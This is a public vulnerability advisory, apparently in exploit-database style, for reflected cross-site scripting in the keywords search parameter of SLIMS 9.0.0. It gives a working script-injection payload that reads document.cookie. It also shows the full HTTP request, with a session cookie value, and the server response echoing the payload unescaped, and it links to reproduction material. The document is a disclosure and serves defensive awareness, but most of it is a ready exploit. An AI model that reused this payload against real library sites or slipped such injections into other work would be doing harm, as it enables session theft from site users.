## Title: Senayan Library Management System v9.0.0 a.k.a SLIMS 9
Multiple XSS-Reflected vulnerabilities
## Author: nu11secur1ty
## Date: 12.09.2022
## Vendor: https://slims.web.id/web/
## Software: https://github.com/slims/slims9_bulian/releases/download/v9.0.0/slims9_bulian-9.0.0.zip
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.0.0

## Description:
The value of the keywords request parameter is copied into the value
of an HTML tag attribute which is encapsulated in double quotation
marks.
The payload m8vzl"><script>alert(hello_vulnerability)</script>hidhc
was submitted in the keywords parameter.
This input was echoed unmodified in the application's response.

## STATUS: HIGH Vulnerability

[+] Payload:

```GET
GET /slims9_bulian-9.0.0/index.php?search=search&keywords=m8vzl"><script>alert(document.cookie)</script>hidhc
HTTP/1.1
Host: pwnedhost.com
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107
Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: SenayanMember=aoujjbpmorr1km0t1j9g5cnhju
Upgrade-Insecure-Requests: 1
Referer: http://pwnedhost.com/slims9_bulian-9.0.0/index.php?search=search&keywords=wd4iuxeo08r8d72ubgugx0nc5fylp2k6o9l4h6ywn
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0

```
[+] Response:

```HTTP/1
HTTP/1.1 200 OK
Date: Fri, 09 Dec 2022 06:23:20 GMT
Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30
X-Frame-Options: SAMEORIGIN
X-Powered-By: PHP/7.4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-XSS-Protection: 1; mode=block
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29492

<!--
# ===============================
# Classic SLiMS Template
# ===============================
# @Author: Waris Agung Widodo
# @Email:  ido.alit@gmail.com
# @Date:   2018-01-23T11:25:57+07:00
# @Last modified by:   Waris Agung Widodo
# @Last modified time: 2019-01-03T11:25:57+07:00
-->
<!DOCTYPE html>
<html>
<head>
    <meta charset="utf-8">
    <title>Open Source Library Management System | Senayan</title>
    <meta name="viewport" content="width=device-width,
initial-scale=1, shrink-to-fit=no">

    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
    <meta http-equiv="Pragma" content="no-cache"/>
    <meta http-equiv="Cache-Control" content="no-store, no-cache,
must-revalidate, post-check=0, pre-check=0"/>
    <meta http-equiv="Expires" content="Sat, 26 Jul 1997 05:00:00 GMT"/>

        <meta name="description" content="Open Source Library
Management System | Senayan">
      <meta name="keywords" content="Open Source Library Management System">
      <meta name="viewport" content="width=device-width,
height=device-height, initial-scale=1">
    <meta name="generator" content="SLiMS 9 (Bulian)">
    <meta name="theme-color" content="#000">

    <meta property="og:locale" content="en_US"/>
    <meta property="og:type" content="book"/>
    <meta property="og:title" content="Open Source Library Management
System | Senayan"/>
        <meta property="og:description" content="Open Source Library
Management System"/>
      <meta property="og:url"
content="//pwnedhost.com/slims9_bulian-9.0.0/index.php?search=search&keywords=m8vzl"><script>alert(document.cookie)</script>hidhc"/>
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.0.0)

## Proof and Exploit:
[href](https://streamable.com/ac60v3)

## Time spent
`01:00:00`